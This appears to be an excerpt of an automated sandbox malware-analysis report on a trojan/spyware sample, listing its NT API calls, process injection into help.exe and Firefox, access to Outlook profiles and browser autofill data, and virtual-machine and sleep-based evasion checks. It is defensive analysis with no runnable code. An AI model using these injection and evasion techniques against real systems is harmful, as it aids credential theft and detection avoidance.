      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A07D4C19_2_03A07D4C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03950D6919_2_03950D69
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039E9C9819_2_039E9C98
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03968CDF19_2_03968CDF
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A1ACEB19_2_03A1ACEB
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039D7CE819_2_039D7CE8
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0396FCE019_2_0396FCE0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03940C1219_2_03940C12
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395AC2019_2_0395AC20
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0EC6019_2_03A0EC60
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A06C6919_2_03A06C69
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039FEC4C19_2_039FEC4C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03953C6019_2_03953C60
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F3E74019_2_02F3E740
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F3888019_2_02F38880
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F5028919_2_02F50289
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F5024C19_2_02F5024C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F5152419_2_02F51524
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4FA4619_2_02F4FA46
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4FA4319_2_02F4FA43
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F50EAD19_2_02F50EAD
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F32FB019_2_02F32FB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F50CC219_2_02F50CC2
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F50C2919_2_02F50C29
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F32D9019_2_02F32D90
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F32D8719_2_02F32D87
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F39D1019_2_02F39D10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: String function: 1D8AEF10 appears 105 times
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: String function: 1D865050 appears 36 times
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: String function: 1D81B910 appears 266 times
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: String function: 1D89E692 appears 84 times
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: String function: 1D877BE4 appears 88 times
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03997BE4 appears 96 times
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0393B910 appears 268 times
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 039CEF10 appears 105 times
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03985050 appears 36 times
      Source: C:\Windows\SysWOW64\help.exeCode function: String function: 039BE692 appears 86 times
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033451F3 NtProtectVirtualMemory,2_2_033451F3
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03346451 NtResumeThread,2_2_03346451
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862DA0 NtReadVirtualMemory,LdrInitializeThunk,11_2_1D862DA0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_1D862DC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862D10 NtQuerySystemInformation,LdrInitializeThunk,11_2_1D862D10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862CF0 NtDelayExecution,LdrInitializeThunk,11_2_1D862CF0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862C30 NtMapViewOfSection,LdrInitializeThunk,11_2_1D862C30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862C50 NtUnmapViewOfSection,LdrInitializeThunk,11_2_1D862C50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862F00 NtCreateFile,LdrInitializeThunk,11_2_1D862F00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862EB0 NtProtectVirtualMemory,LdrInitializeThunk,11_2_1D862EB0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862ED0 NtResumeThread,LdrInitializeThunk,11_2_1D862ED0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862E50 NtCreateSection,LdrInitializeThunk,11_2_1D862E50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8629F0 NtReadFile,LdrInitializeThunk,11_2_1D8629F0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862B90 NtFreeVirtualMemory,LdrInitializeThunk,11_2_1D862B90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862BC0 NtQueryInformationToken,LdrInitializeThunk,11_2_1D862BC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862B10 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_1D862B10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8634E0 NtCreateMutant,LdrInitializeThunk,11_2_1D8634E0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862D50 NtWriteVirtualMemory,11_2_1D862D50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D863C90 NtOpenThread,11_2_1D863C90
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862CD0 NtEnumerateKey,11_2_1D862CD0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862C10 NtOpenProcess,11_2_1D862C10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862C20 NtSetInformationFile,11_2_1D862C20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D863C30 NtOpenProcessToken,11_2_1D863C30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862FB0 NtSetValueKey,11_2_1D862FB0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862F30 NtOpenDirectoryObject,11_2_1D862F30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862E80 NtCreateProcessEx,11_2_1D862E80
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862EC0 NtQuerySection,11_2_1D862EC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862E00 NtQueueApcThread,11_2_1D862E00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8629D0 NtWaitForSingleObject,11_2_1D8629D0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8638D0 NtGetContextThread,11_2_1D8638D0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862B80 NtCreateKey,11_2_1D862B80
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862BE0 NtQueryVirtualMemory,11_2_1D862BE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862B00 NtQueryValueKey,11_2_1D862B00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862B20 NtQueryInformationProcess,11_2_1D862B20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862A80 NtClose,11_2_1D862A80
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862AA0 NtQueryInformationFile,11_2_1D862AA0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862AC0 NtEnumerateValueKey,11_2_1D862AC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D862A10 NtWriteFile,11_2_1D862A10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D864570 NtSuspendThread,11_2_1D864570
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D864260 NtSetContextThread,11_2_1D864260
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_0166A45D NtProtectVirtualMemory,11_2_0166A45D
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039834E0 NtCreateMutant,LdrInitializeThunk,19_2_039834E0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982B90 NtFreeVirtualMemory,LdrInitializeThunk,19_2_03982B90
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982B80 NtCreateKey,LdrInitializeThunk,19_2_03982B80
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982BC0 NtQueryInformationToken,LdrInitializeThunk,19_2_03982BC0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982B10 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_03982B10
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982B00 NtQueryValueKey,LdrInitializeThunk,19_2_03982B00
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982A80 NtClose,LdrInitializeThunk,19_2_03982A80
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982AC0 NtEnumerateValueKey,LdrInitializeThunk,19_2_03982AC0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982A10 NtWriteFile,LdrInitializeThunk,19_2_03982A10
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039829F0 NtReadFile,LdrInitializeThunk,19_2_039829F0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982F00 NtCreateFile,LdrInitializeThunk,19_2_03982F00
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982E50 NtCreateSection,LdrInitializeThunk,19_2_03982E50
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_03982DC0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982D10 NtQuerySystemInformation,LdrInitializeThunk,19_2_03982D10
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982CF0 NtDelayExecution,LdrInitializeThunk,19_2_03982CF0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982C30 NtMapViewOfSection,LdrInitializeThunk,19_2_03982C30
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03984260 NtSetContextThread,19_2_03984260
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03984570 NtSuspendThread,19_2_03984570
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982BE0 NtQueryVirtualMemory,19_2_03982BE0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982B20 NtQueryInformationProcess,19_2_03982B20
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982AA0 NtQueryInformationFile,19_2_03982AA0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039829D0 NtWaitForSingleObject,19_2_039829D0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039838D0 NtGetContextThread,19_2_039838D0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982FB0 NtSetValueKey,19_2_03982FB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982F30 NtOpenDirectoryObject,19_2_03982F30
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982E80 NtCreateProcessEx,19_2_03982E80
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982EB0 NtProtectVirtualMemory,19_2_03982EB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982ED0 NtResumeThread,19_2_03982ED0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982EC0 NtQuerySection,19_2_03982EC0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982E00 NtQueueApcThread,19_2_03982E00
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982DA0 NtReadVirtualMemory,19_2_03982DA0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982D50 NtWriteVirtualMemory,19_2_03982D50
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03983C90 NtOpenThread,19_2_03983C90
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982CD0 NtEnumerateKey,19_2_03982CD0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982C10 NtOpenProcess,19_2_03982C10
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03983C30 NtOpenProcessToken,19_2_03983C30
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982C20 NtSetInformationFile,19_2_03982C20
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03982C50 NtUnmapViewOfSection,19_2_03982C50
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C760 NtCreateFile,19_2_02F4C760
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C890 NtClose,19_2_02F4C890
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C860 NtDeleteFile,19_2_02F4C860
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C810 NtReadFile,19_2_02F4C810
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C940 NtAllocateVirtualMemory,19_2_02F4C940
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C75A NtCreateFile,19_2_02F4C75A
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4C85A NtDeleteFile,19_2_02F4C85A
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1323617090.0000000000094000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Jjfmcz1Hsz.exe
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1186427363.000000001D778000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Jjfmcz1Hsz.exe
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1325789310.0000000001887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Jjfmcz1Hsz.exe
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1349200939.000000001DAC0000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Jjfmcz1Hsz.exe
      Source: Jjfmcz1Hsz.exe, 0000000B.00000003.1180334989.000000001D5C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Jjfmcz1Hsz.exe
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Jjfmcz1Hsz.exe
      Source: Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Jjfmcz1Hsz.exe
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\help.exeSection loaded: edgegdi.dllJump to behavior
      Source: Jjfmcz1Hsz.exeStatic PE information: invalid certificate
      Source: Jjfmcz1Hsz.exeVirustotal: Detection: 46%
      Source: Jjfmcz1Hsz.exeReversingLabs: Detection: 37%
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile read: C:\Users\user\Desktop\Jjfmcz1Hsz.exeJump to behavior
      Source: Jjfmcz1Hsz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Jjfmcz1Hsz.exe C:\Users\user\Desktop\Jjfmcz1Hsz.exe
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess created: C:\Users\user\Desktop\Jjfmcz1Hsz.exe C:\Users\user\Desktop\Jjfmcz1Hsz.exe
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess created: C:\Users\user\Desktop\Jjfmcz1Hsz.exe C:\Users\user\Desktop\Jjfmcz1Hsz.exeJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004030D9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile created: C:\Users\user\AppData\Local\Temp\nse112A.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@22/19
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0040205E CoCreateInstance,MultiByteToWideChar,2_2_0040205E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_0040431C
      Source: 231-EqK-.19.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile written: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed\Custom3.iniJump to behavior
      Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\StrikketjetJump to behavior
      Source: Jjfmcz1Hsz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Jjfmcz1Hsz.exe, 0000000B.00000003.1178049479.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1184340741.000000001D64B000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1322964721.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1327471330.000000000375C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Jjfmcz1Hsz.exe, Jjfmcz1Hsz.exe, 0000000B.00000003.1178049479.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1184340741.000000001D64B000.00000004.00000800.00020000.00000000.sdmp, help.exe, help.exe, 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1322964721.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1327471330.000000000375C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: help.pdbGCTL source: Jjfmcz1Hsz.exe, 0000000B.00000002.1325746962.0000000001883000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1323580862.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: help.pdb source: Jjfmcz1Hsz.exe, 0000000B.00000002.1325746962.0000000001883000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1323580862.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1994520363.0000000008428000.00000004.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000000.978219667.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.1200754284.000000000072B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_10002D20 push eax; ret 2_2_10002D4E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332373E push esp; iretd 2_2_0332373F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332673E push B949F1B9h; ret 2_2_03326743
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03323927 push esi; retf 2_2_033239AC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03323575 pushad ; ret 2_2_03323576
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03323969 push esi; retf 2_2_033239AC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033251B9 push edx; retf 2_2_033251C9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033238F6 push esi; retf 2_2_033239AC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03324CC2 push FFFFFFBAh; retf 2_2_03324CC4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8208CD push ecx; mov dword ptr [esp], ecx11_2_1D8208D6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_0166A45D push edi; ret 11_2_0166A2A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_0166A45D push edi; ret 11_2_0166A480
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039408CD push ecx; mov dword ptr [esp], ecx19_2_039408D6
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F483EF push ecx; retf 19_2_02F48400
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F483A9 pushad ; ret 19_2_02F483AB
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4859D push D358F441h; iretd 19_2_02F485A8
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4FA0C push eax; ret 19_2_02F4FA12
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4884B push eax; iretd 19_2_02F4884C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4F9A2 push eax; ret 19_2_02F4F9A8
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4F9AB push eax; ret 19_2_02F4FA12
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F4F955 push eax; ret 19_2_02F4F9A8
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F36CAF push edi; retf 19_2_02F36CB1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_10001A5D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile created: C:\Users\user\AppData\Local\Temp\nsl1543.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Windows\SysWOW64\help.exe TID: 7264Thread sleep count: 114 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\help.exe TID: 7264Thread sleep time: -228000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8768Thread sleep time: -150000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8768Thread sleep count: 72 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8768Thread sleep time: -72000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8768Thread sleep count: 83 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8768Thread sleep time: -83000s >= -30000sJump to behavior
